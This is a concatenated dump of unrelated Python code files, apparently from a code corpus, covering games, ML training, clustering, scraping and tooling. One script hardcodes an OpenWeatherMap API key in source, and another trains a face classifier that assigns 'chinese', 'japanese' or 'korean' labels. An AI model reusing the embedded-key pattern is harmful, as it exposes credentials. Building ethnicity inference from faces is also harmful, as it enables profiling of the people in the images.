'mangahi_dr2_062321_gbtonly_withconf.fits'\n\nout=add_conflag(catfile,confile,outfile,addprob=True)\n","sub_path":"database/add_conflag_cl.py","file_name":"add_conflag_cl.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189109666","text":"from ezpg import *\n\n#paddle class\nclass paddle():\n def __init__(self, x, y):#initiation function\n self.height = 200\n self.width = 20\n self.x = x\n self.y = y-self.height\n\n def draw(self):#for displaying stuff to the screen\n rect(self.x, self.y, self.width, self.height)\n \n def move(self, speed):#for moving the paddles\n self.y += speed\n self.y = constrain(self.y, 0, height()-self.height)\n\n#ball class\nclass Ball():\n def __init__(self):#initiation function\n self.minspeed = 0.2\n self.maxspeed = 1\n self.x = width()/2\n self.y = height()/2\n self.r = 10\n self.vx = 0\n self.vy = 0\n\n if random(0, 1000) < 500:\n self.vx= random(self.minspeed, self.maxspeed)\n else:\n self.vx = random(-self.maxspeed, -self.minspeed)\n\n if random(0, 1000) < 500:\n self.vy = random(self.minspeed, self.maxspeed)\n else:\n self.vy = random(-self.maxspeed, -self.minspeed)\n\n def draw(self):#draw function\n rect(self.x, self.y, 2*self.r, 2*self.r)\n \n def move(self):\n self.x += self.vx\n self.y += self.vy\n \n #vertical bouncing\n if self.y+self.r > height():\n self.vy *= -1\n elif self.y-self.r < 0:\n self.vy *= -1\n\n#main sketch class\nclass ponggame(sketch):\n p1 = None#paddle object\n p2 = None#paddle object\n b = None#ball object\n\n def setup(self):\n global p1#this is needed so you\n global p2#are able to set this to a value\n global b\n\n createCanvas(800, 600)#create the canvas\n rename(\"pong\")\n p1 = paddle(10, height()/2)#create p1 object\n p2 = paddle(width()-30, height()/2)#create p2 object\n b = Ball()\n\n def draw(self):\n background(0, 0, 0)#set background\n p1.draw()#draw player 1's paddle\n p2.draw()#draw player 2's paddle\n b.draw()#draw the ball\n b.move()#move the ball\n\n #handle movement\n if isPressed(\"Q\"):\n p1.move(-1)\n if isPressed(\"A\"):\n p1.move(1)\n if isPressed(\"up\"):\n p2.move(-1)\n if isPressed(\"down\"):\n p2.move(1)\n\nstart(ponggame())\n","sub_path":"demos/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"126459632","text":"import argparse\nimport os\nimport pickle\n\nfrom keras.applications import MobileNetV2\nfrom keras.callbacks import LearningRateScheduler, ModelCheckpoint\nfrom keras.layers import Conv2D, Dense, Dropout, Flatten, Input\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\ndef step_decay(epoch):\n x = 1e-3\n if epoch >= 60:\n x = 1e-4\n if epoch >= 100:\n x = 1e-5\n return x\n\n\ndef net(image_size, pretrained_model, alpha=1.0):\n inputs = Input(shape=(image_size, image_size, 3))\n model_mobilenet = MobileNetV2(input_shape=(image_size, image_size, 3),\n alpha=alpha,\n include_top=False,\n weights=pretrained_model,\n input_tensor=None,\n pooling=None)\n x = model_mobilenet(inputs)\n conv_1 = Conv2D(128, (1, 1), activation='relu')(x)\n flat_1 = Flatten()(conv_1)\n drop_1 = Dropout(0.5)(flat_1)\n dence_1 = Dense(128, activation='relu', name='feat_a')(drop_1)\n dence_2 = Dense(32, activation='relu', name='feat_b')(dence_1)\n outputs = Dense(3, activation=\"softmax\")(dence_2)\n model = Model(inputs=inputs, outputs=outputs)\n\n return model\n\n\ndef train(arguments):\n if not os.path.exists(arguments.model_output_directory):\n os.makedirs(arguments.model_output_directory)\n\n train_data_generator = ImageDataGenerator(\n rescale=1. / 255,\n horizontal_flip=arguments.horizontal_flip,\n rotation_range=arguments.rotation_range,\n brightness_range=arguments.brightness_range)\n\n validation_data_generator = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = train_data_generator.flow_from_directory(\n arguments.train_data_directory,\n target_size=(arguments.image_size, arguments.image_size),\n batch_size=arguments.batch_size,\n classes=arguments.classes,\n color_mode='rgb',\n class_mode='categorical')\n\n validation_generator = validation_data_generator.flow_from_directory(\n arguments.validation_data_directory,\n target_size=(arguments.image_size, arguments.image_size),\n batch_size=arguments.batch_size,\n classes=arguments.classes,\n color_mode='rgb',\n class_mode='categorical')\n\n train_num = train_generator.samples\n validation_num = validation_generator.samples\n\n model = net(arguments.image_size, arguments.pretrained_model)\n\n model.summary()\n\n model.compile(optimizer=Adam(lr=1e-3),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n lr_decay = LearningRateScheduler(step_decay)\n\n callbacks = \\\n [ModelCheckpoint(arguments.model_output_directory + '/weights.{epoch:02d}-{val_accuracy:.2f}-{val_loss:.2f}.h5',\n monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=False, mode='auto',\n period=1), lr_decay]\n\n history = model.fit_generator(\n train_generator,\n steps_per_epoch=train_num // arguments.batch_size,\n validation_data=validation_generator,\n validation_steps=validation_num // arguments.batch_size,\n epochs=arguments.epochs,\n callbacks=callbacks,\n verbose=1,\n shuffle=True)\n\n model.save(arguments.model_output_directory + '/final_model.h5')\n\n with open(arguments.model_output_directory + '/learning_history.pkl', 'wb') as f:\n pickle.dump(history.history, f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train face network')\n parser.add_argument('--train_data_directory',\n type=str,\n default='',\n help='Input train data directory')\n parser.add_argument('--validation_data_directory',\n type=str,\n default='',\n help='Input validation data directory')\n parser.add_argument('--image_size',\n type=int,\n default=128,\n help='Model input image size')\n parser.add_argument('--horizontal_flip',\n action='store_true',\n help='Horizontal flip')\n parser.add_argument('--rotation_range',\n type=int,\n default=30,\n help='Rotation range')\n parser.add_argument('--brightness_range',\n type=float,\n default=[0.6, 1.4],\n help='Brightness range')\n parser.add_argument('--batch_size',\n type=int,\n default=16,\n help='Batch size')\n parser.add_argument('--classes',\n type=str,\n default=['chinese', 'japanese', 'korean'],\n help='Target classes to recognize')\n parser.add_argument('--pretrained_model',\n type=str,\n default=None,\n help='Pretrained model')\n parser.add_argument('--epochs', type=int, default=120, help='Epochs')\n parser.add_argument('--model_output_directory',\n type=str,\n default=\"output\",\n help='Name of the directory to output models')\n arguments = parser.parse_args()\n\n assert os.path.isdir(\n arguments.train_data_directory), 'Input train data directory'\n assert os.path.isdir(\n arguments.validation_data_directory), 'Input validation data directory'\n\n train(arguments)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179276801","text":"\"\"\"\n给定一个含有 n 个正整数的数组和一个正整数 s ,找出该数组中满足其和 ≥ s 的长度最小的连续子数组。如果不存在符合条件的连续子数组,返回 0。\n\n示例:\n\n输入: s = 7, nums = [2,3,1,2,4,3]\n输出: 2\n解释: 子数组 [4,3] 是该条件下的长度最小的连续子数组。\n\n\n进阶:\n\n如果你已经完成了O(n) 时间复杂度的解法, 请尝试 O(n log n) 时间复杂度的解法\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/minimum-size-subarray-sum\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\"\"\"\n思路:\nnums1=[2, 5, 6, 8, 12, 15]\nnums2=[-5, -2, -1, 1, 5, 8]\n判断下标差的最小值\n如何比较?较为复杂\n是否有简单方法?\n上述方法就是双指针解法/滑动窗口\n\"\"\"\n\n\nclass Solution:\n def minSubArrayLen(self, s: int, nums: [int]) -> int:\n if not nums:\n return 0\n left = 0\n cur = 0\n res = float(\"inf\")\n for right in range(len(nums)):\n cur += nums[right]\n while cur >= s:\n res = min(res, right - left + 1)\n cur -= nums[left]\n left += 1\n return res if res != float(\"inf\") else 0\n\n\nif __name__ == '__main__':\n d = Solution()\n print(d.minSubArrayLen(7, [2, 3, 1, 3, 4, 3]))\n","sub_path":"minSubArrayLen.py","file_name":"minSubArrayLen.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"431745872","text":"from cloudrail.knowledge.context.azure.resources.service_bus.azure_service_bus_namespace import AzureServiceBusNamespace, ServiceBusNamespaceSku\nfrom cloudrail.knowledge.context.azure.resources_builders.scanner.base_azure_scanner_builder import BaseAzureScannerBuilder\n\n\nclass ServiceBusNamespaceBuilder(BaseAzureScannerBuilder):\n\n def get_file_name(self) -> str:\n return 'list-servicebus-namespaces.json'\n\n def do_build(self, attributes: dict) -> AzureServiceBusNamespace:\n properties = attributes['properties']\n sku_attributes = attributes['sku']\n return AzureServiceBusNamespace(name=attributes['name'],\n sku=ServiceBusNamespaceSku(sku_attributes['name']),\n capacity=sku_attributes.get('capacity', 0),\n zone_redundant=properties.get('zoneRedundant', False))\n","sub_path":"cloudrail/knowledge/context/azure/resources_builders/scanner/service_bus_namespace_builder.py","file_name":"service_bus_namespace_builder.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237242744","text":"# coding: utf-8\r\nimport re\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\n#判断字符是否为中文或中文标点\r\ndef is_chinese_charactar(uchar):\r\n delCStr = '”“《》(),。;?——¥!{}【】' \r\n\r\n if (uchar >= u'\\u4e00' and uchar <= u'\\u9fa5') or delCStr.find(uchar) >= 0:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n#判断字符串是否有中文 \r\n'''\r\npython判断是否是中文需要满足u'[\\u4e00-\\u9fa5]+',\r\n需要注意如果正则表达式的模式中使用unicode,那么\r\n要匹配的字符串也必须转换为unicode,否则肯定会不匹配。\r\n'''\r\n''' \r\ndef has_chinese_charactar(content):\r\n iconvcontent = unicode(content)\r\n zhPattern = re.compile(u'[\\u4e00-\\u9fa5]+')\r\n match = zhPattern.search(iconvcontent)\r\n res = False\r\n if match:\r\n res = True\r\n return res\r\n'''\r\n\r\nf = open(\"original.txt\")\r\nline = f.readline()\r\ncount = 0\r\ndict = {}\r\nwhile line:\r\n # print line, \r\n # print(line, end = '')   # 在 Python 3中使用\r\n line = unicode(line, 'utf-8').strip()\r\n l_zh = -1\r\n if len(line):\r\n count += 1\r\n for i in range(len(line)):\r\n if is_chinese_charactar(line[i]):\r\n l_zh = i\r\n if l_zh == len(line)-1:\r\n # print line.split(' ')[-1]\r\n # print line[0: len(line)-len(line.split(' ')[-1])-1]\r\n key = line[0: len(line)-len(line.split(' ')[-1])-1]\r\n value = line.split(' ')[-1]\r\n\r\n else: \r\n # print line.split(' ')[0]\r\n # print line[len(line.split(' ')[0])+1:]\r\n key = line[len(line.split(' ')[0])+1:]\r\n value = line.split(' ')[0]\r\n \r\n dict[key] = value\r\n\r\n line = f.readline()\r\n\r\nf.close()\r\n\r\noutput = open('target.txt', 'w')\r\noutput.write('|:-----|:-----|\\n')\r\nfor k in sorted(dict.keys()):\r\n # print k, \":\", dict[k]\r\n output.write('|')\r\n output.write(k)\r\n output.write('|')\r\n output.write(dict[k])\r\n output.write('|\\n')\r\n output.flush()\r\n\r\noutput.close()\r\n","sub_path":"python/20150116/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326351678","text":"import unittest\nimport numpy as np\nfrom ..gmrf import GMRF\nfrom numpy.linalg import inv\nfrom scipy.stats import norm, multivariate_normal\n\nclass TestLogPdf(unittest.TestCase):\n\n def test_one_dim(self):\n \"\"\" Test log pdf for one dimensional data \"\"\"\n x = np.array([1])\n mean = np.array([2])\n Q = np.array([[ 1 / 25 ]])\n\n gmrf = GMRF()\n self.assertAlmostEqual(gmrf._logpdf(x, mean, Q),\n norm.logpdf(1, 2, 5))\n\n def test_mulit_dim(self):\n \"\"\" Test log pdf for multi dimensional data \"\"\"\n x = np.array([1, 2, 1.7])\n mean = np.array([2, 1, 5])\n Q = np.array([[1.2, 0.7, -0.4],\n [0.7, 0.68, 0.01],\n [-0.4, 0.01, 1]])\n\n gmrf = GMRF()\n self.assertAlmostEqual(gmrf._logpdf(x, mean, Q),\n multivariate_normal.logpdf(x, mean, inv(Q)))\n\nclass TestBic(unittest.TestCase):\n\n def test_simple_chain(self):\n \"\"\" Test BIC for simple chain A - B - C\"\"\"\n Q = np.array([[1, -0.5, 0], [-0.5, 1.25, -0.5], [0, -0.5, 1]])\n\n X = np.array([[-0.5, -1.5, 0.4],\n [3.9, -1.7, -1.1],\n [7.8, -3.2, 1.3],\n [2.0, -2.9, 3.2],\n [3.4, -8, 1.3]])\n\n mean = np.mean(X, axis=0)\n\n gmrf = GMRF()\n gmrf.precision_ = Q\n gmrf.mean_ = np.mean(X, axis=0)\n bic, converged = gmrf.bic(X, gamma=0)\n\n self.assertTrue(converged)\n self.assertAlmostEqual(bic, -2 * np.sum(multivariate_normal.logpdf(X, mean, inv(Q))) + 5 * np.log(5))\n","sub_path":"lib/gaussian/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214801790","text":"# -*- coding: utf-8 -*-\n\"\"\" Probe system performance\n Author: Kai JIN\n Update: 17/11/22\n\"\"\"\nimport sys\nimport tensorflow as tf\nfrom tensorflow import profiler\n\n\nclass Profiler():\n \"\"\" The class to manage the probe tools, offering:\n 1) network structure (parameter number)\n 2) FLOPs\n 3) time and memory analyzeing\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def parameters():\n \"\"\" parameters\n \"\"\"\n param_stats = profiler.profile(\n graph=tf.get_default_graph(),\n cmd='scope',\n options=profiler.ProfileOptionBuilder.trainable_variables_parameter())\n sys.stdout.write('total params: %d\\n' % param_stats.total_parameters)\n\n @staticmethod\n def flops():\n \"\"\" flops\n \"\"\"\n param_stats = tf.profiler.profile(\n graph=tf.get_default_graph(),\n cmd='scope',\n options=tf.profiler.ProfileOptionBuilder.float_operation())\n sys.stdout.write('total flops: %d\\n' % param_stats.total_float_ops)\n\n @staticmethod\n def time_memory(path, sess, train_op):\n \"\"\" time_memory\n \"\"\"\n builder = tf.profiler.ProfileOptionBuilder\n opts = builder(builder.time_and_memory()).order_by('micros').build()\n with tf.contrib.tfprof.ProfileContext(path,\n trace_steps=range(10, 20),\n dump_steps=[20]) as pctx:\n pctx.trace_next_step()\n pctx.dump_next_step()\n sess.run(train_op)\n pctx.profiler.profile_operations(options=opts)\n","sub_path":"core/utils/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170225953","text":"#!/usr/bin/env python\n\n'''\nA simple Python wrapper for the bh_tsne binary that makes it easier to use it\nfor TSV files in a pipeline without any shell script trickery.\n\nNote: The script does some minimal sanity checking of the input, but don't\n expect it to cover all cases. After all, it is a just a wrapper.\n\nExample:\n\n > echo -e '1.0\\t0.0\\n0.0\\t1.0' | ./bhtsne.py -d 2 -p 0.1\n -2458.83181442 -6525.87718385\n 2458.83181442 6525.87718385\n\nThe output will not be normalised, maybe the below one-liner is of interest?:\n\n python -c 'import numpy; from sys import stdin, stdout;\n d = numpy.loadtxt(stdin); d -= d.min(axis=0); d /= d.max(axis=0);\n numpy.savetxt(stdout, d, fmt=\"%.8f\", delimiter=\"\\t\")'\n\nAuthors: Pontus Stenetorp \n Philippe Remy \nVersion: 2016-03-08\n'''\n\n# Copyright (c) 2013, Pontus Stenetorp \n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nfrom argparse import ArgumentParser, FileType\nfrom os.path import abspath, dirname, isfile, join as path_join\nfrom shutil import rmtree\nfrom struct import calcsize, pack, unpack\nfrom subprocess import Popen\nfrom sys import stderr, stdin, stdout\nfrom tempfile import mkdtemp\nfrom platform import system\nfrom os import devnull\nimport numpy as np\nimport os, sys\nimport io\n\n# Default hyper-parameter values from van der Maaten (2014)\n# https://lvdmaaten.github.io/publications/papers/JMLR_2014.pdf (Experimental Setup, page 13)\nDEFAULT_NO_DIMS = 2\nINITIAL_DIMENSIONS = 50\nDEFAULT_PERPLEXITY = 50\nDEFAULT_THETA = 0.5\nEMPTY_SEED = -1\nDEFAULT_USE_PCA = True\nDEFAULT_MAX_ITERATIONS = 1000\n\n###\n\ndef argparse():\n argparse = ArgumentParser('bh_tsne Python wrapper')\n argparse.add_argument('-d', '--no_dims', type=int,\n default=DEFAULT_NO_DIMS)\n argparse.add_argument('-p', '--perplexity', type=float,\n default=DEFAULT_PERPLEXITY)\n # 0.0 for theta is equivalent to vanilla t-SNE\n argparse.add_argument('-t', '--theta', type=float, default=DEFAULT_THETA)\n argparse.add_argument('-r', '--randseed', type=int, default=EMPTY_SEED)\n argparse.add_argument('-n', '--initial_dims', type=int, default=INITIAL_DIMENSIONS)\n argparse.add_argument('-v', '--verbose', action='store_true')\n argparse.add_argument('-i', '--input', type=FileType('r'), default=stdin)\n argparse.add_argument('-o', '--output', type=FileType('w'),\n default=stdout)\n argparse.add_argument('--use_pca', action='store_true')\n argparse.add_argument('--no_pca', dest='use_pca', action='store_false')\n argparse.set_defaults(use_pca=DEFAULT_USE_PCA)\n argparse.add_argument('-m', '--max_iter', type=int, default=DEFAULT_MAX_ITERATIONS)\n return argparse\n\n\ndef _read_unpack(fmt, fh):\n return unpack(fmt, fh.read(calcsize(fmt)))\n\n\ndef _is_filelike_object(f):\n try:\n return isinstance(f, (file, io.IOBase))\n except NameError:\n # 'file' is not a class in python3\n return isinstance(f, io.IOBase)\n\n\ndef init_bh_tsne(samples, workdir, no_dims=DEFAULT_NO_DIMS, initial_dims=INITIAL_DIMENSIONS, perplexity=DEFAULT_PERPLEXITY,\n theta=DEFAULT_THETA, randseed=EMPTY_SEED, verbose=False, use_pca=DEFAULT_USE_PCA, max_iter=DEFAULT_MAX_ITERATIONS):\n\n if use_pca:\n samples = samples - np.mean(samples, axis=0)\n cov_x = np.dot(np.transpose(samples), samples)\n [eig_val, eig_vec] = np.linalg.eig(cov_x)\n\n # sorting the eigen-values in the descending order\n eig_vec = eig_vec[:, eig_val.argsort()[::-1]]\n\n if initial_dims > len(eig_vec):\n initial_dims = len(eig_vec)\n\n # truncating the eigen-vectors matrix to keep the most important vectors\n eig_vec = np.real(eig_vec[:, :initial_dims])\n samples = np.dot(samples, eig_vec)\n\n # Assume that the dimensionality of the first sample is representative for\n # the whole batch\n sample_dim = len(samples[0])\n sample_count = len(samples)\n\n # Note: The binary format used by bh_tsne is roughly the same as for\n # vanilla tsne\n with open(path_join(workdir, 'data.dat'), 'wb') as data_file:\n # Write the bh_tsne header\n data_file.write(pack('iiddii', sample_count, sample_dim, theta, perplexity, no_dims, max_iter))\n # Then write the data\n for sample in samples:\n data_file.write(pack('{}d'.format(len(sample)), *sample))\n # Write random seed if specified\n if randseed != EMPTY_SEED:\n data_file.write(pack('i', randseed))\n\ndef load_data(input_file):\n # Read the data, using numpy's good judgement\n return np.loadtxt(input_file)\n\n\n","sub_path":"wrapper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563453651","text":"#!/usr/bin/python3\nimport math\n\ndef odleglosc(x1, y1, x2, y2):\n a = abs(x1 - x2)\n b = abs(y1 - y2)\n\n return a*a + b*b\n\n\n\n\ndef main():\n c = input().split()\n n = int(c[0])\n m = int(c[1])\n x = int(c[2])\n y = int(c[3])\n r = int(c[4])\n\n for i in range(1, n+1):\n for j in range(1, m+1):\n if odleglosc(x, y, i, j) <= r*r:\n print('#', end='')\n else:\n print('.', end='')\n print() \n\n\nmain()","sub_path":"2020/05/16/kolo.py","file_name":"kolo.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407987799","text":"import pyowm\r\n\r\nowm = pyowm.OWM('e2ef41348ab4f86bf88ed303bc16b2dc')\r\nmgr = owm.weather_manager()\r\n\r\nwhere = input('Где искать погоду?: ') # Комментарий для task-1\r\n\r\nobservation = mgr.weather_at_place(where)\r\nw = observation.weather\r\nprint(w)\r\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53183092","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom chian.items import ChianItem\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nclass ChinaspiderSpider(RedisCrawlSpider):\n name = 'chinaspider'\n allowed_domains = ['china.com']\n redis_key = 'zhwSpider:start_urls'\n #start_urls = ['https://travel.china.com/hotspot/']\n\n rules = (\n Rule(LinkExtractor(allow=r'h.*?index_\\d+.html'), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n\n item = ChianItem()\n article_list = response.xpath('//div[@class=\"m_Con\"]')\n #print(article_list)\n for i in article_list:\n item['title'] = i.xpath('.//div[2]/h2/a/text()').extract()\n item['content'] = i.xpath('.//div[2]/div/text()').extract()\n item['time'] = i.xpath('.//div[2]/p/span/text()').extract()\n print(item['title'])\n print(item['content'])\n print(item['time'])\n yield item","sub_path":"爬虫10/爬虫/chian/chian/spiders/chinaspider.py","file_name":"chinaspider.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645331257","text":"import numpy as np\nimport csv\nfrom copy import deepcopy\nfrom bellman_utilities import BellmanUtil\nfrom scipy.stats import norm\n\n\nclass DataGen:\n def __init__(self, model_params, tot_samples=70):\n curr_params = deepcopy(model_params)\n bellutil = BellmanUtil(**curr_params)\n curr_params['rho'] = bellutil.rho\n curr_params['decisions'] = bellutil.decisions\n decisions = bellutil.decisions\n\n for i, column in enumerate(decisions.T):\n try:\n upperbound = (column == 2).nonzero()[0][0]\n lowerbound = (column == 1).nonzero()[0][-1]\n except IndexError:\n raise(ValueError, 'Non-existant bounds at some timestep')\n column[upperbound:] = 2\n column[:lowerbound] = 1\n decisions[:, i] = column\n\n condN = tot_samples // 2\n dt = model_params['dt']\n T = model_params['T']\n t_d = model_params['t_delay']\n t_max = model_params['t_max'] - t_d\n maxind = int(t_max / dt) - 1\n t_values = np.arange(0, T, dt)\n g_values = model_params['g_values']\n\n ev_values = np.zeros((2, tot_samples // 2, t_values.shape[0]))\n ev_values[0, :, :] = np.random.normal(loc=0, scale=model_params['sigma'][0],\n size=ev_values.shape[1:])\n ev_values[1, :, :] = np.random.normal(loc=1, scale=model_params['sigma'][1],\n size=ev_values.shape[1:])\n\n g_traces = np.zeros_like(ev_values)\n for C in (0, 1):\n for sample in range(condN):\n for samplen in range(t_values.shape[0]):\n g_traces[C, sample, samplen] = self.g_t(ev_values[C, sample, :samplen + 1],\n model_params['mu'],\n model_params['sigma'])\n binned_traces = np.digitize(g_traces, g_values, right=True)\n binned_traces[binned_traces == g_values.shape[0]] = g_values.shape[0] - 1\n\n response_times = np.zeros(ev_values.shape[:-1])\n response_idents = np.zeros(ev_values.shape[:-1])\n for C in (0, 1):\n for sample in range(condN):\n i = 0\n while i <= maxind:\n currdec = decisions[binned_traces[C, sample, i], i]\n if currdec == 1:\n response_times[C, sample] = t_values[i] + t_d\n response_idents[C, sample] = 0\n break\n elif currdec == 2:\n response_times[C, sample] = t_values[i] + t_d\n response_idents[C, sample] = 1\n break\n elif (currdec == 0) and (i == maxind):\n response_times[C, sample] = t_max + t_d\n response_idents[C, sample] = 2\n i += 1\n\n self.response_times = response_times\n self.response_idents = response_idents\n self.model_params = curr_params\n\n def g_t(self, x, mu, sigma, prior=0.5):\n presprobs = norm.pdf(x, loc=mu[1], scale=sigma[1])\n absprobs = norm.pdf(x, loc=mu[0], scale=sigma[0])\n denom = np.product(presprobs) * prior + np.product(absprobs) * prior\n return np.product(presprobs) * prior / denom\n\n def save_csv(self, savepath):\n with open(savepath, 'r') as fr:\n existing = fr.read(6) == 'target'\n\n with open(savepath, 'a') as fw:\n writer = csv.writer(fw)\n if not existing:\n writer.writerow(['target', 'setsize', 'dyn', 'resp', 'rt', 'sub', 'exp', 'correct'])\n curr_N = self.model_params['N']\n abs_resp = zip(self.response_idents[0, :], self.response_times[0, :])\n pres_resp = zip(self.response_idents[1, :], self.response_times[1, :])\n # First write all responses for target absent simulations\n for response, rt in abs_resp:\n correct = response == 0\n if response == 0:\n adjusted_response = 2\n elif response == 1:\n adjusted_response = 1\n elif response == 2:\n adjusted_response = -1\n writer.writerow(['Absent', curr_N, 'Dynamic',\n adjusted_response, \"{:.7f}\".format(rt), 666, 1, correct])\n # Then write all responses for target present sims\n for response, rt in pres_resp:\n correct = response == 1\n if response == 0:\n adjusted_response = 2\n elif response == 1:\n adjusted_response = 1\n elif response == 2:\n adjusted_response = -1\n writer.writerow(['Present', curr_N, 'Dynamic',\n adjusted_response, \"{:.7f}\".format(rt), 666, 1, correct])\n","sub_path":"codes/synth_data.py","file_name":"synth_data.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169322242","text":"from json import loads\nfrom subprocess import check_output\n\n\ndef run_jsdoc(app):\n \"\"\"Run JSDoc across a whole codebase, and squirrel away its results.\"\"\"\n # JSDoc defaults to utf8-encoded output.\n doclets = loads(check_output(['jsdoc', app.config.js_source_path, '-r', '-X']).decode('utf8'))\n app._sphinxjs_jsdoc_output = dict((d['longname'], d) for d in doclets\n if d.get('comment')\n and not d.get('undocumented'))\n # 2 doclets are made for classes, and they are largely redundant: one for\n # the class itself and another for the constructor. However, the\n # constructor one gets merged into the class one and is intentionally\n # marked as undocumented, even if it isn't. See\n # https://github.com/jsdoc3/jsdoc/issues/1129.\n","sub_path":"sphinx_js/jsdoc.py","file_name":"jsdoc.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523405526","text":"import numpy as np\nfrom sklearn.cluster import KMeans\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef distance(p1, p2):\n \"\"\" Get the distance between two points \"\"\"\n dist = np.sqrt(np.power(p1 - p2, 2).sum())\n return dist\n\ndef get_dist_matrix(data):\n \"\"\"\n Get the distance matrix\n input: raw data\n return: distance matrix\n \"\"\"\n n = len(data) # dimension: NxD\n # initialize distance matrix, dimension: NxN\n dist_matrix = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist_matrix[i][j] = dist_matrix[j][i] = distance(data[i], data[j])\n return dist_matrix\n\nclass SC(object):\n\n def __init__(self, n_clusters, knn_k):\n self.n_clusters = n_clusters\n self.knn_k = knn_k\n\n \"\"\" \n Get adjacent matrix\n input:\n data: raw data\n k: the number of cluster\n return:\n adjacent matrix\n \"\"\"\n def getW(self, data, k):\n n = len(data)\n dist_matrix = get_dist_matrix(data)\n\n W = np.zeros((n, n))\n for idx, dist in enumerate(dist_matrix):\n # sort each row and get index list\n # smaller distance means two points are closer\n idx_array = np.argsort(dist)\n # set the element in each row to 1\n # except for the diagonal elements\n W[idx][idx_array[1 : k + 1]] = 1\n W_T = np.transpose(W)\n return (W + W_T) / 2\n\n \"\"\"\n Get degree matrix\n input:\n W: adjacent matrix\n return:\n degree matrix\n \"\"\"\n def getD(self, W):\n D = np.diag(sum(W))\n return D\n\n \"\"\"\n Get unnormalized Laplace matrix\n input:\n W: adjacent matrix\n D: degree matrix\n return:\n Laplace matrix\n \"\"\"\n def getL(self, D,W):\n return D-W\n\n \"\"\"\n Get eigen matrix of Laplace matrix\n input:\n L: Laplace matrix\n k: the number of clusters\n return:\n eigen matrix\n \"\"\"\n def getEigen(self, L, cluster_num):\n eig_vec, eig_val, _ = np.linalg.svd(L)\n # get the first k smallest eigenvectors\n idx = np.argsort(eig_val)[0 : cluster_num]\n return eig_vec[:, idx]\n\n\n def fit(self, data):\n k = self.knn_k\n cluster_num = self.n_clusters\n data = np.array(data)\n W = self.getW(data, k)\n D = self.getD(W)\n L = self.getL(D, W)\n eig_vec = self.getEigen(L, cluster_num)\n self.eigvec = eig_vec\n\n\n def predict(self, data):\n clf = KMeans(n_clusters=self.n_clusters)\n s = clf.fit(self.eigvec) # clusters\n labels = s.labels_\n return labels\n\n\nif __name__ == '__main__':\n cluster_num = 3\n knn_k = 5\n data = np.array([[1, 2], [1.5, 1.8], [5, 8], [8, 8], [1, 0.6], [9, 11]])\n data = data[0:-1] # last column is the label\n spectral_clustering = SC(n_clusters= 3, knn_k = 